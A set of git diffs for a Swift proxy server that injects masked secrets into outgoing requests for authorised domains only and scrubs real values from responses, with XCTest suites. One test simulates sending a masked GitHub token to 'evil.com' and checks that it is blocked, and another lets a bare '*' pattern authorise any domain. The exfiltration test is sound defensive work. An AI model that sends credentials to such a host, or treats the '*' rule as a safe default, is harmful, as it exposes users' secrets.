+            return try jsonErrorResponse(status: .badRequest, message: "Secret must have at least one authorized domain")
+        } catch {
+            return try jsonErrorResponse(status: .internalServerError, message: errorMessage(error))
+        }
+    }
+
+    router.delete("/api/secrets/:name") { _, context in
+        let name = context.parameters.get("name") ?? ""
+        do {
+            try SecretStore.delete(name: name)
+            return try jsonResponse(.object(["ok": .bool(true), "name": .string(name)]))
+        } catch {
+            return try jsonErrorResponse(status: .internalServerError, message: errorMessage(error))
+        }
+    }
+
     for method in fetchProxyMethods {
         router.on("/api/fetch-proxy", method: method) { request, _ in
             guard let targetURLValue = request.headers[targetURLHeader],
@@ -199,11 +246,60 @@ func registerAPIRoutes(
                 return try jsonErrorResponse(status: .badRequest, message: "Missing X-Target-URL header")
             }
 
+            let targetHostname = targetURL.host ?? ""
+
             do {
-                let rawBody = try await collectBody(from: request)
-                let upstreamRequest = try makeProxyRequest(from: request, targetURL: targetURL, rawBody: rawBody)
+                var rawBody = try await collectBody(from: request)
+
+                // --- Secret injection: scan headers + body for masked values ---
+                var injectedHeaders = request.headers
+                for field in request.headers {
+                    switch secretInjector.inject(text: field.value, hostname: targetHostname) {
+                    case .success(let replaced):
+                        if replaced != field.value {
+                            injectedHeaders[field.name] = replaced
+                        }
+                    case .domainBlocked(let secretName, let hostname):
+                        return try jsonErrorResponse(
+                            status: .forbidden,
+                            message: "Secret \(secretName) is not allowed for domain \(hostname)"
+                        )
+                    }
+                }
+
+                // Inject secrets into request body
+                if rawBody.readableBytes > 0,
+                   let bodyString = rawBody.getString(at: rawBody.readerIndex, length: rawBody.readableBytes) {
+                    switch secretInjector.inject(text: bodyString, hostname: targetHostname) {
+                    case .success(let replaced):
+                        if replaced != bodyString {
+                            rawBody = ByteBuffer(string: replaced)
+                        }
+                    case .domainBlocked(let secretName, let hostname):
+                        return try jsonErrorResponse(
+                            status: .forbidden,
+                            message: "Secret \(secretName) is not allowed for domain \(hostname)"
+                        )
+                    }
+                }
+
+                // Also inject into the target URL header value for the upstream request
+                let injectedRequest = Request(
+                    head: .init(
+                        method: request.method,
+                        scheme: request.head.scheme,
+                        authority: request.head.authority,
+                        path: request.head.path,
+                        headerFields: injectedHeaders
+                    ),
+                    body: request.body
+                )
+
+                let upstreamRequest = try makeProxyRequest(from: injectedRequest, targetURL: targetURL, rawBody: rawBody)
                 let upstreamResponse = try await httpClient.execute(request: upstreamRequest).get()
-                return makeProxyResponse(from: upstreamResponse)
+
+                // --- Response scrubbing: replace real values with masked ---
+                return makeProxyResponse(from: upstreamResponse, secretInjector: secretInjector)
             } catch {
                 return try jsonErrorResponse(status: .badGateway, message: "Proxy fetch failed: \(errorMessage(error))")
             }
@@ -396,7 +492,7 @@ private func makeProxyRequest(from request: Request, targetURL: URL, rawBody: By
     )
 }
 
-private func makeProxyResponse(from response: HTTPClient.Response) -> Response {
+private func makeProxyResponse(from response: HTTPClient.Response, secretInjector: SecretInjector) -> Response {
     // Forbidden-header transport: collect Set-Cookie headers and encode as X-Proxy-Set-Cookie
     let setCookies = response.headers[canonicalForm: "set-cookie"].map { String($0) }
 
@@ -414,16 +510,36 @@ private func makeProxyResponse(from response: HTTPClient.Response) -> Response {
     if !setCookies.isEmpty,
        let jsonData = try? JSONSerialization.data(withJSONObject: setCookies),
        let jsonString = String(data: jsonData, encoding: .utf8) {
-        headers[HTTPField.Name("X-Proxy-Set-Cookie")!] = jsonString
+        headers[HTTPField.Name("X-Proxy-Set-Cookie")!] = secretInjector.scrub(text: jsonString)
+    }
+
+    // Scrub real secret values from response headers
+    if !secretInjector.isEmpty {
+        var scrubbedHeaders = HTTPFields()
+        for field in headers {
+            let scrubbedValue = secretInjector.scrub(text: field.value)
+            scrubbedHeaders.append(HTTPField(name: field.name, value: scrubbedValue))
+        }
+        headers = scrubbedHeaders
     }
 
     headers[cacheControlHeader] = "no-store, no-cache"
     headers[HTTPField.Name.contentLength] = nil
 
+    // Scrub real secret values from response body
+    var responseBody = response.body ?? ByteBuffer()
+    if !secretInjector.isEmpty, responseBody.readableBytes > 0,
+       let bodyString = responseBody.getString(at: responseBody.readerIndex, length: responseBody.readableBytes) {
+        let scrubbed = secretInjector.scrub(text: bodyString)
+        if scrubbed != bodyString {
+            responseBody = ByteBuffer(string: scrubbed)
+        }
+    }
+
     return Response(
         status: HTTPResponse.Status(code: Int(response.status.code), reasonPhrase: response.status.reasonPhrase),
         headers: headers,
-        body: .init(byteBuffer: response.body ?? ByteBuffer())
+        body: .init(byteBuffer: responseBody)
     )
 }
 

--- a/packages/swift-server/Sources/Server/APIRoutes.swift
+++ b/packages/swift-server/Sources/Server/APIRoutes.swift
@@ -205,42 +205,6 @@ func registerAPIRoutes(
         return try jsonResponse(.array(items))
     }
 
-    router.post("/api/secrets") { request, context in
-        let payload = try await decodeJSONObjectBody(from: request, context: context)
-        guard let name = payload["name"]?.stringValue, !name.isEmpty else {
-            return try jsonErrorResponse(status: .badRequest, message: "Missing required field: name")
-        }
-        guard let value = payload["value"]?.stringValue, !value.isEmpty else {
-            return try jsonErrorResponse(status: .badRequest, message: "Missing required field: value")
-        }
-        let domains: [String]
-        if case .array(let arr) = payload["domains"] {
-            domains = arr.compactMap(\.stringValue)
-        } else {
-            domains = []
-        }
-        do {
-            try SecretStore.set(name: name, value: value, domains: domains)
-            secretInjector.reload()
-            return try jsonResponse(.object(["ok": .bool(true), "name": .string(name)]))
-        } catch SecretStoreError.emptyDomains {
-            return try jsonErrorResponse(status: .badRequest, message: "Secret must have at least one authorized domain")
-        } catch {
-            return try jsonErrorResponse(status: .internalServerError, message: errorMessage(error))
-        }
-    }
-
-    router.delete("/api/secrets/:name") { _, context in
-        let name = context.parameters.get("name") ?? ""
-        do {
-            try SecretStore.delete(name: name)
-            secretInjector.reload()
-            return try jsonResponse(.object(["ok": .bool(true), "name": .string(name)]))
-        } catch {
-            return try jsonErrorResponse(status: .internalServerError, message: errorMessage(error))
-        }
-    }
-
     // Masked secrets endpoint — returns name + maskedValue + domains for shell env population.
     // The browser fetches this at shell init to populate env vars with masked values.
     // Real values are never exposed; only deterministic session-scoped masks.

--- a/packages/swift-server/Tests/APIRoutesTests.swift
+++ b/packages/swift-server/Tests/APIRoutesTests.swift
@@ -194,7 +194,9 @@ final class APIRoutesTests: XCTestCase {
             logDir: nil,
             logDirectoryURL: nil,
             prompt: nil,
-            staticRoot: nil
+            staticRoot: nil,
+            envFile: nil,
+            envFileURL: nil
         )
     }
 

--- a/packages/swift-server/Tests/KeychainSecretStoreTests.swift
+++ b/packages/swift-server/Tests/KeychainSecretStoreTests.swift
@@ -1,0 +1,94 @@
+import XCTest
+@testable import slicc_server
+
+final class KeychainSecretStoreTests: XCTestCase {
+    /// Unique prefix per test run so parallel/repeated runs don't collide.
+    private let prefix = "TEST_\(UUID().uuidString.prefix(8))_"
+
+    private func secretName(_ base: String) -> String { prefix + base }
+
+    override func tearDown() {
+        // Clean up any leftover test secrets.
+        for entry in SecretStore.list() where entry.name.hasPrefix(prefix) {
+            try? SecretStore.delete(name: entry.name)
+        }
+        super.tearDown()
+    }
+
+    // MARK: - set + get round-trip
+
+    func testSetAndGetRoundTrip() throws {
+        let name = secretName("GITHUB_TOKEN")
+        try SecretStore.set(name: name, value: "ghp_abc123", domains: ["api.github.com", "*.github.com"])
+
+        let secret = SecretStore.get(name: name)
+        XCTAssertNotNil(secret)
+        XCTAssertEqual(secret?.name, name)
+        XCTAssertEqual(secret?.value, "ghp_abc123")
+        XCTAssertEqual(secret?.domains, ["api.github.com", "*.github.com"])
+    }
+
+    // MARK: - update existing secret
+
+    func testSetOverwritesExistingSecret() throws {
+        let name = secretName("OPENAI_KEY")
+        try SecretStore.set(name: name, value: "sk-old", domains: ["api.openai.com"])
+        try SecretStore.set(name: name, value: "sk-new", domains: ["api.openai.com", "api.azure.com"])
+
+        let secret = SecretStore.get(name: name)
+        XCTAssertEqual(secret?.value, "sk-new")
+        XCTAssertEqual(secret?.domains, ["api.openai.com", "api.azure.com"])
+    }
+
+    // MARK: - get non-existent
+
+    func testGetReturnsNilForMissingSecret() {
+        XCTAssertNil(SecretStore.get(name: secretName("DOES_NOT_EXIST")))
+    }
+
+    // MARK: - delete
+
+    func testDeleteRemovesSecret() throws {
+        let name = secretName("TO_DELETE")
+        try SecretStore.set(name: name, value: "val", domains: ["example.com"])
+        try SecretStore.delete(name: name)
+        XCTAssertNil(SecretStore.get(name: name))
+    }
+
+    func testDeleteNonExistentDoesNotThrow() throws {
+        try SecretStore.delete(name: secretName("NEVER_EXISTED"))
+    }
+
+    // MARK: - list
+
+    func testListReturnsNamesAndDomainsWithoutValues() throws {
+        let name1 = secretName("LIST_A")
+        let name2 = secretName("LIST_B")
+        try SecretStore.set(name: name1, value: "secret1", domains: ["a.com"])
+        try SecretStore.set(name: name2, value: "secret2", domains: ["b.com", "c.com"])
+
+        let entries = SecretStore.list().filter { $0.name.hasPrefix(prefix) }
+        let names = entries.map(\.name).sorted()
+
+        XCTAssertEqual(names, [name1, name2].sorted())
+        // Ensure values are not included (SecretEntry has no value field by design).
+        for entry in entries {
+            if entry.name == name1 {
+                XCTAssertEqual(entry.domains, ["a.com"])
+            } else if entry.name == name2 {
+                XCTAssertEqual(entry.domains, ["b.com", "c.com"])
+            }
+        }
+    }
+
+    // MARK: - empty domains rejected
+
+    func testSetRejectsEmptyDomains() {
+        let name = secretName("NO_DOMAINS")
+        XCTAssertThrowsError(try SecretStore.set(name: name, value: "val", domains: [])) { error in
+            XCTAssertEqual(error as? SecretStoreError, .emptyDomains)
+        }
+        XCTAssertNil(SecretStore.get(name: name))
+    }
+}
+

--- a/packages/swift-server/Tests/SecretAPIRoutesTests.swift
+++ b/packages/swift-server/Tests/SecretAPIRoutesTests.swift
@@ -164,7 +164,9 @@ final class SecretAPIRoutesTests: XCTestCase {
             logDir: nil,
             logDirectoryURL: nil,
             prompt: nil,
-            staticRoot: nil
+            staticRoot: nil,
+            envFile: nil,
+            envFileURL: nil
         )
     }
 

--- a/packages/swift-server/Tests/SecretAPIRoutesTests.swift
+++ b/packages/swift-server/Tests/SecretAPIRoutesTests.swift
@@ -1,0 +1,192 @@
+import AsyncHTTPClient
+import Foundation
+import Hummingbird
+import HummingbirdTesting
+import XCTest
+@testable import slicc_server
+
+final class SecretAPIRoutesTests: XCTestCase {
+    /// Unique prefix per test run so parallel/repeated runs don't collide.
+    private let prefix = "APITEST_\(UUID().uuidString.prefix(8))_"
+
+    private func secretName(_ base: String) -> String { prefix + base }
+
+    override func tearDown() {
+        for entry in SecretStore.list() where entry.name.hasPrefix(prefix) {
+            try? SecretStore.delete(name: entry.name)
+        }
+        super.tearDown()
+    }
+
+    func testListSecretsReturnsNamesAndDomains() async throws {
+        let name = secretName("LIST_TOK")
+        try SecretStore.set(name: name, value: "secret_val", domains: ["api.example.com"])
+
+        try await withHTTPClient { httpClient in
+            let router = Router()
+            registerAPIRoutes(router: router, lickSystem: LickSystem(), config: self.makeConfig(), httpClient: httpClient)
+
+            let app = Application(responder: router.buildResponder())
+            try await app.test(.router) { client in
+                try await client.execute(uri: "/api/secrets", method: .get) { response in
+                    XCTAssertEqual(response.status, .ok)
+                    let body = try self.decodeJSONArray(from: response.body)
+                    let entry = body.first(where: { item in
+                        if case .object(let obj) = item, obj["name"]?.stringValue == name { return true }
+                        return false
+                    })
+                    XCTAssertNotNil(entry, "Expected to find secret \(name) in list")
+                    if case .object(let obj) = entry {
+                        // Verify domains are present
+                        if case .array(let domains) = obj["domains"] {
+                            XCTAssertEqual(domains, [.string("api.example.com")])
+                        } else {
+                            XCTFail("Expected domains array")
+                        }
+                        // Verify value is NOT present
+                        XCTAssertNil(obj["value"], "Secret value must never be returned")
+                    }
+                }
+            }
+        }
+    }
+
+    func testCreateSecret() async throws {
+        let name = secretName("CREATE_TOK")
+        try await withHTTPClient { httpClient in
+            let router = Router()
+            registerAPIRoutes(router: router, lickSystem: LickSystem(), config: self.makeConfig(), httpClient: httpClient)
+
+            let app = Application(responder: router.buildResponder())
+            try await app.test(.router) { client in
+                let body = #"{"name":"\#(name)","value":"ghp_test123","domains":["api.github.com"]}"#
+                try await client.execute(
+                    uri: "/api/secrets",
+                    method: .post,
+                    headers: [.contentType: "application/json"],
+                    body: ByteBuffer(string: body)
+                ) { response in
+                    XCTAssertEqual(response.status, .ok)
+                    let result = try self.decodeJSONObject(from: response.body)
+                    XCTAssertEqual(result["ok"], .bool(true))
+                    XCTAssertEqual(result["name"], .string(name))
+                }
+            }
+        }
+        // Verify it was actually stored
+        let stored = SecretStore.get(name: name)
+        XCTAssertNotNil(stored)
+        XCTAssertEqual(stored?.value, "ghp_test123")
+        XCTAssertEqual(stored?.domains, ["api.github.com"])
+    }
+
+    func testCreateSecretRejectsMissingName() async throws {
+        try await withHTTPClient { httpClient in
+            let router = Router()
+            registerAPIRoutes(router: router, lickSystem: LickSystem(), config: self.makeConfig(), httpClient: httpClient)
+
+            let app = Application(responder: router.buildResponder())
+            try await app.test(.router) { client in
+                try await client.execute(
+                    uri: "/api/secrets",
+                    method: .post,
+                    headers: [.contentType: "application/json"],
+                    body: ByteBuffer(string: #"{"value":"v","domains":["d.com"]}"#)
+                ) { response in
+                    XCTAssertEqual(response.status, .badRequest)
+                }
+            }
+        }
+    }
+
+    func testCreateSecretRejectsEmptyDomains() async throws {
+        let name = secretName("NO_DOMAIN")
+        try await withHTTPClient { httpClient in
+            let router = Router()
+            registerAPIRoutes(router: router, lickSystem: LickSystem(), config: self.makeConfig(), httpClient: httpClient)
+
+            let app = Application(responder: router.buildResponder())
+            try await app.test(.router) { client in
+                let body = #"{"name":"\#(name)","value":"v","domains":[]}"#
+                try await client.execute(
+                    uri: "/api/secrets",
+                    method: .post,
+                    headers: [.contentType: "application/json"],
+                    body: ByteBuffer(string: body)
+                ) { response in
+                    XCTAssertEqual(response.status, .badRequest)
+                }
+            }
+        }
+    }
+
+    func testDeleteSecret() async throws {
+        let name = secretName("DEL_TOK")
+        try SecretStore.set(name: name, value: "val", domains: ["x.com"])
+
+        try await withHTTPClient { httpClient in
+            let router = Router()
+            registerAPIRoutes(router: router, lickSystem: LickSystem(), config: self.makeConfig(), httpClient: httpClient)
+
+            let app = Application(responder: router.buildResponder())
+            try await app.test(.router) { client in
+                try await client.execute(uri: "/api/secrets/\(name)", method: .delete) { response in
+                    XCTAssertEqual(response.status, .ok)
+                    let result = try self.decodeJSONObject(from: response.body)
+                    XCTAssertEqual(result["ok"], .bool(true))
+                    XCTAssertEqual(result["name"], .string(name))
+                }
+            }
+        }
+        XCTAssertNil(SecretStore.get(name: name))
+    }
+
+    // MARK: - Helpers
+
+    private func makeConfig() -> ServerConfig {
+        .init(
+            dev: true,
+            serveOnly: false,
+            cdpPort: 9222,
+            explicitCdpPort: false,
+            electron: false,
+            electronApp: nil,
+            electronAppURL: nil,
+            kill: false,
+            lead: false,
+            leadWorkerBaseUrl: nil,
+            leadWorkerBaseURL: nil,
+            profile: nil,
+            join: false,
+            joinUrl: nil,
+            joinURL: nil,
+            logLevel: "info",
+            logDir: nil,
+            logDirectoryURL: nil,
+            prompt: nil,
+            staticRoot: nil
+        )
+    }
+
+    private func decodeJSONObject(from body: ByteBuffer) throws -> LickSystem.JSONObject {
+        try JSONDecoder().decode(LickSystem.JSONObject.self, from: Data(String(buffer: body).utf8))
+    }
+
+    private func decodeJSONArray(from body: ByteBuffer) throws -> [LickSystem.JSONValue] {
+        try JSONDecoder().decode([LickSystem.JSONValue].self, from: Data(String(buffer: body).utf8))
+    }
+
+    private func withHTTPClient(
+        _ body: (HTTPClient) async throws -> Void
+    ) async throws {
+        let httpClient = HTTPClient(eventLoopGroupProvider: .singleton)
+        do {
+            try await body(httpClient)
+            try await httpClient.shutdown()
+        } catch {
+            try? await httpClient.shutdown()
+            throw error
+        }
+    }
+}
+

--- a/packages/swift-server/Tests/SecretAPIRoutesTests.swift
+++ b/packages/swift-server/Tests/SecretAPIRoutesTests.swift
@@ -51,76 +51,28 @@ final class SecretAPIRoutesTests: XCTestCase {
         }
     }
 
-    func testCreateSecret() async throws {
-        let name = secretName("CREATE_TOK")
+    func testPostSecretRouteIsRemoved() async throws {
         try await withHTTPClient { httpClient in
             let router = Router()
             registerAPIRoutes(router: router, lickSystem: LickSystem(), config: self.makeConfig(), httpClient: httpClient)
 
             let app = Application(responder: router.buildResponder())
             try await app.test(.router) { client in
-                let body = #"{"name":"\#(name)","value":"ghp_test123","domains":["api.github.com"]}"#
+                let body = #"{"name":"SHOULD_FAIL","value":"v","domains":["d.com"]}"#
                 try await client.execute(
                     uri: "/api/secrets",
                     method: .post,
                     headers: [.contentType: "application/json"],
                     body: ByteBuffer(string: body)
                 ) { response in
-                    XCTAssertEqual(response.status, .ok)
-                    let result = try self.decodeJSONObject(from: response.body)
-                    XCTAssertEqual(result["ok"], .bool(true))
-                    XCTAssertEqual(result["name"], .string(name))
-                }
-            }
-        }
-        // Verify it was actually stored
-        let stored = SecretStore.get(name: name)
-        XCTAssertNotNil(stored)
-        XCTAssertEqual(stored?.value, "ghp_test123")
-        XCTAssertEqual(stored?.domains, ["api.github.com"])
-    }
-
-    func testCreateSecretRejectsMissingName() async throws {
-        try await withHTTPClient { httpClient in
-            let router = Router()
-            registerAPIRoutes(router: router, lickSystem: LickSystem(), config: self.makeConfig(), httpClient: httpClient)
-
-            let app = Application(responder: router.buildResponder())
-            try await app.test(.router) { client in
-                try await client.execute(
-                    uri: "/api/secrets",
-                    method: .post,
-                    headers: [.contentType: "application/json"],
-                    body: ByteBuffer(string: #"{"value":"v","domains":["d.com"]}"#)
-                ) { response in
-                    XCTAssertEqual(response.status, .badRequest)
+                    // Route no longer exists — expect 404
+                    XCTAssertEqual(response.status, .notFound)
                 }
             }
         }
     }
 
-    func testCreateSecretRejectsEmptyDomains() async throws {
-        let name = secretName("NO_DOMAIN")
-        try await withHTTPClient { httpClient in
-            let router = Router()
-            registerAPIRoutes(router: router, lickSystem: LickSystem(), config: self.makeConfig(), httpClient: httpClient)
-
-            let app = Application(responder: router.buildResponder())
-            try await app.test(.router) { client in
-                let body = #"{"name":"\#(name)","value":"v","domains":[]}"#
-                try await client.execute(
-                    uri: "/api/secrets",
-                    method: .post,
-                    headers: [.contentType: "application/json"],
-                    body: ByteBuffer(string: body)
-                ) { response in
-                    XCTAssertEqual(response.status, .badRequest)
-                }
-            }
-        }
-    }
-
-    func testDeleteSecret() async throws {
+    func testDeleteSecretRouteIsRemoved() async throws {
         let name = secretName("DEL_TOK")
         try SecretStore.set(name: name, value: "val", domains: ["x.com"])
 
@@ -131,14 +83,11 @@ final class SecretAPIRoutesTests: XCTestCase {
             let app = Application(responder: router.buildResponder())
             try await app.test(.router) { client in
                 try await client.execute(uri: "/api/secrets/\(name)", method: .delete) { response in
-                    XCTAssertEqual(response.status, .ok)
-                    let result = try self.decodeJSONObject(from: response.body)
-                    XCTAssertEqual(result["ok"], .bool(true))
-                    XCTAssertEqual(result["name"], .string(name))
+                    // Route no longer exists — expect 404
+                    XCTAssertEqual(response.status, .notFound)
                 }
             }
         }
-        XCTAssertNil(SecretStore.get(name: name))
     }
 
     // MARK: - Helpers

--- a/packages/swift-server/Tests/SecretInjectorTests.swift
+++ b/packages/swift-server/Tests/SecretInjectorTests.swift
@@ -1,0 +1,143 @@
+import XCTest
+@testable import slicc_server
+
+final class SecretInjectorTests: XCTestCase {
+
+    private func makeInjector(secrets: [SecretInjector.LoadedSecret]) -> SecretInjector {
+        SecretInjector(secrets: secrets)
+    }
+
+    private func makeSecret(
+        name: String = "GITHUB_TOKEN",
+        realValue: String = "ghp_realSecret123",
+        maskedValue: String = "ghp_masked999abc",
+        domains: [String] = ["api.github.com", "*.github.com"]
+    ) -> SecretInjector.LoadedSecret {
+        .init(name: name, realValue: realValue, maskedValue: maskedValue, domains: domains)
+    }
+
+    // MARK: - inject()
+
+    func testInjectReplacesMatchedMaskWithRealValue() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        let result = injector.inject(text: "Bearer ghp_masked999abc", hostname: "api.github.com")
+        guard case .success(let text) = result else { return XCTFail("Expected success") }
+        XCTAssertEqual(text, "Bearer ghp_realSecret123")
+    }
+
+    func testInjectLeavesTextUnchangedWhenNoMaskPresent() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        let result = injector.inject(text: "Bearer some-other-token", hostname: "api.github.com")
+        guard case .success(let text) = result else { return XCTFail("Expected success") }
+        XCTAssertEqual(text, "Bearer some-other-token")
+    }
+
+    func testInjectReturnsDomainBlockedForUnauthorizedDomain() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        let result = injector.inject(text: "Bearer ghp_masked999abc", hostname: "evil.com")
+        guard case .domainBlocked(let secretName, let hostname) = result else {
+            return XCTFail("Expected domainBlocked")
+        }
+        XCTAssertEqual(secretName, "GITHUB_TOKEN")
+        XCTAssertEqual(hostname, "evil.com")
+    }
+
+    func testInjectAllowsWildcardDomain() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        let result = injector.inject(text: "ghp_masked999abc", hostname: "uploads.github.com")
+        guard case .success(let text) = result else { return XCTFail("Expected success") }
+        XCTAssertEqual(text, "ghp_realSecret123")
+    }
+
+    func testInjectMultipleSecretsInSameText() {
+        let injector = makeInjector(secrets: [
+            makeSecret(name: "GH", realValue: "ghp_real1", maskedValue: "ghp_mask1", domains: ["api.github.com"]),
+            makeSecret(name: "AI", realValue: "sk-real2", maskedValue: "sk-mask2", domains: ["api.github.com", "api.openai.com"]),
+        ])
+        let result = injector.inject(text: "GH=ghp_mask1 AI=sk-mask2", hostname: "api.github.com")
+        guard case .success(let text) = result else { return XCTFail("Expected success") }
+        XCTAssertEqual(text, "GH=ghp_real1 AI=sk-real2")
+    }
+
+    func testInjectBlocksIfAnySecretDomainFails() {
+        let injector = makeInjector(secrets: [
+            makeSecret(name: "GH", realValue: "ghp_real1", maskedValue: "ghp_mask1", domains: ["api.github.com"]),
+            makeSecret(name: "AI", realValue: "sk-real2", maskedValue: "sk-mask2", domains: ["api.openai.com"]),
+        ])
+        // Text contains both masked values, but hostname only matches GH
+        let result = injector.inject(text: "ghp_mask1 sk-mask2", hostname: "api.github.com")
+        guard case .domainBlocked(let secretName, _) = result else {
+            return XCTFail("Expected domainBlocked")
+        }
+        XCTAssertEqual(secretName, "AI")
+    }
+
+    // MARK: - scrub()
+
+    func testScrubReplacesRealValuesWithMasked() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        let result = injector.scrub(text: "token: ghp_realSecret123")
+        XCTAssertEqual(result, "token: ghp_masked999abc")
+    }
+
+    func testScrubMultipleOccurrences() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        let result = injector.scrub(text: "ghp_realSecret123 and ghp_realSecret123")
+        XCTAssertEqual(result, "ghp_masked999abc and ghp_masked999abc")
+    }
+
+    func testScrubMultipleSecrets() {
+        let injector = makeInjector(secrets: [
+            makeSecret(name: "A", realValue: "secret_a", maskedValue: "masked_a", domains: ["a.com"]),
+            makeSecret(name: "B", realValue: "secret_b", maskedValue: "masked_b", domains: ["b.com"]),
+        ])
+        let result = injector.scrub(text: "A=secret_a B=secret_b")
+        XCTAssertEqual(result, "A=masked_a B=masked_b")
+    }
+
+    func testScrubLeavesTextUnchangedWhenNoRealValues() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        let result = injector.scrub(text: "nothing to scrub here")
+        XCTAssertEqual(result, "nothing to scrub here")
+    }
+
+    // MARK: - isEmpty
+
+    func testIsEmptyWithNoSecrets() {
+        let injector = makeInjector(secrets: [])
+        XCTAssertTrue(injector.isEmpty)
+    }
+
+    func testIsEmptyWithSecrets() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        XCTAssertFalse(injector.isEmpty)
+    }
+
+    // MARK: - maskedEnvironment
+
+    func testMaskedEnvironmentReturnsMaskedValues() {
+        let injector = makeInjector(secrets: [
+            makeSecret(name: "TOKEN_A", realValue: "real_a", maskedValue: "mask_a", domains: ["a.com"]),
+            makeSecret(name: "TOKEN_B", realValue: "real_b", maskedValue: "mask_b", domains: ["b.com"]),
+        ])
+        let env = injector.maskedEnvironment
+        XCTAssertEqual(env["TOKEN_A"], "mask_a")
+        XCTAssertEqual(env["TOKEN_B"], "mask_b")
+        XCTAssertEqual(env.count, 2)
+    }
+
+    // MARK: - Integration with mask() function
+
+    func testInitWithSessionIdProducesDeterministicMasks() {
+        // Use real masking to verify integration — can't use Keychain in tests
+        // so just verify the mask function is called correctly
+        let realValue = "ghp_testValue123"
+        let sessionId = "test-session-42"
+        let maskedA = mask(sessionId: sessionId, secretName: "GH", realValue: realValue)
+        let maskedB = mask(sessionId: sessionId, secretName: "GH", realValue: realValue)
+        XCTAssertEqual(maskedA, maskedB)
+        XCTAssertNotEqual(maskedA, realValue)
+        XCTAssertTrue(maskedA.hasPrefix("ghp_"))
+    }
+}
+

--- a/packages/swift-server/Tests/SecretInjectorTests.swift
+++ b/packages/swift-server/Tests/SecretInjectorTests.swift
@@ -72,6 +72,35 @@ final class SecretInjectorTests: XCTestCase {
         XCTAssertEqual(secretName, "AI")
     }
 
+    // MARK: - injectBody()
+
+    func testInjectBodyLeavesMaskedValueWhenDomainDoesNotMatch() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        // Body contains masked value but domain doesn't match — should leave as-is
+        let result = injector.injectBody(text: "conversation: ghp_masked999abc was used", hostname: "bedrock-runtime.us-west-2.amazonaws.com")
+        XCTAssertTrue(result.contains("ghp_masked999abc"))
+        XCTAssertFalse(result.contains("ghp_realSecret123"))
+    }
+
+    func testInjectBodyUnmasksWhenDomainMatches() {
+        let injector = makeInjector(secrets: [makeSecret()])
+        let result = injector.injectBody(text: "token=ghp_masked999abc", hostname: "api.github.com")
+        XCTAssertFalse(result.contains("ghp_masked999abc"))
+        XCTAssertTrue(result.contains("ghp_realSecret123"))
+    }
+
+    func testInjectBodyPartiallyUnmasksWhenSomeDomainsMatch() {
+        let injector = makeInjector(secrets: [
+            makeSecret(name: "GH", realValue: "ghp_real1", maskedValue: "ghp_mask1", domains: ["api.github.com"]),
+            makeSecret(name: "AI", realValue: "sk-real2", maskedValue: "sk-mask2", domains: ["api.openai.com"]),
+        ])
+        // Send to api.github.com — GH should unmask, AI should stay masked
+        let result = injector.injectBody(text: "ghp_mask1 sk-mask2", hostname: "api.github.com")
+        XCTAssertTrue(result.contains("ghp_real1"))
+        XCTAssertTrue(result.contains("sk-mask2"))
+        XCTAssertFalse(result.contains("sk-real2"))
+    }
+
     // MARK: - scrub()
 
     func testScrubReplacesRealValuesWithMasked() {

--- a/packages/swift-server/Tests/SecretMaskingTests.swift
+++ b/packages/swift-server/Tests/SecretMaskingTests.swift
@@ -138,6 +138,12 @@ final class SecretMaskingTests: XCTestCase {
         XCTAssertFalse(domainMatches(pattern: "*.github.com", hostname: "notgithub.com"))
     }
 
+    func testBareWildcardMatchesAnyDomain() {
+        XCTAssertTrue(domainMatches(pattern: "*", hostname: "api.github.com"))
+        XCTAssertTrue(domainMatches(pattern: "*", hostname: "example.com"))
+        XCTAssertTrue(domainMatches(pattern: "*", hostname: "localhost"))
+    }
+
     // MARK: - isAllowedDomain()
 
     func testAllowedDomainAnyMatch() {

--- a/packages/swift-server/Tests/SecretMaskingTests.swift
+++ b/packages/swift-server/Tests/SecretMaskingTests.swift
@@ -1,0 +1,155 @@
+import XCTest
+@testable import slicc_server
+
+final class SecretMaskingTests: XCTestCase {
+
+    // MARK: - mask()
+
+    func testDeterministicOutput() {
+        let a = mask(sessionId: "session-1", secretName: "GITHUB_TOKEN", realValue: "ghp_abc123xyz")
+        let b = mask(sessionId: "session-1", secretName: "GITHUB_TOKEN", realValue: "ghp_abc123xyz")
+        XCTAssertEqual(a, b)
+    }
+
+    func testDifferentSessions() {
+        let a = mask(sessionId: "session-1", secretName: "GITHUB_TOKEN", realValue: "ghp_abc123xyz")
+        let b = mask(sessionId: "session-2", secretName: "GITHUB_TOKEN", realValue: "ghp_abc123xyz")
+        XCTAssertNotEqual(a, b)
+    }
+
+    func testDifferentSecretNames() {
+        let a = mask(sessionId: "s1", secretName: "TOKEN_A", realValue: "sk-abc123")
+        let b = mask(sessionId: "s1", secretName: "TOKEN_B", realValue: "sk-abc123")
+        XCTAssertNotEqual(a, b)
+    }
+
+    func testPreservesGhpPrefix() {
+        let result = mask(sessionId: "s1", secretName: "GH", realValue: "ghp_abc123xyz")
+        XCTAssertTrue(result.hasPrefix("ghp_"))
+        XCTAssertEqual(result.count, "ghp_abc123xyz".count)
+    }
+
+    func testPreservesSkPrefix() {
+        let result = mask(sessionId: "s1", secretName: "OPENAI", realValue: "sk-someLongKey123")
+        XCTAssertTrue(result.hasPrefix("sk-"))
+        XCTAssertEqual(result.count, "sk-someLongKey123".count)
+    }
+
+    func testPreservesAkiaPrefix() {
+        let result = mask(sessionId: "s1", secretName: "AWS", realValue: "AKIAIOSFODNN7EXAMPLE")
+        XCTAssertTrue(result.hasPrefix("AKIA"))
+        XCTAssertEqual(result.count, "AKIAIOSFODNN7EXAMPLE".count)
+    }
+
+    func testPreservesXoxbPrefix() {
+        let result = mask(sessionId: "s1", secretName: "SLACK", realValue: "xoxb-123-456-abc")
+        XCTAssertTrue(result.hasPrefix("xoxb-"))
+        XCTAssertEqual(result.count, "xoxb-123-456-abc".count)
+    }
+
+    func testPreservesGithubPatPrefix() {
+        let result = mask(sessionId: "s1", secretName: "GH", realValue: "github_pat_abc123")
+        XCTAssertTrue(result.hasPrefix("github_pat_"))
+        XCTAssertEqual(result.count, "github_pat_abc123".count)
+    }
+
+    func testPreservesSkAntPrefix() {
+        let result = mask(sessionId: "s1", secretName: "ANTH", realValue: "sk-ant-abcdef")
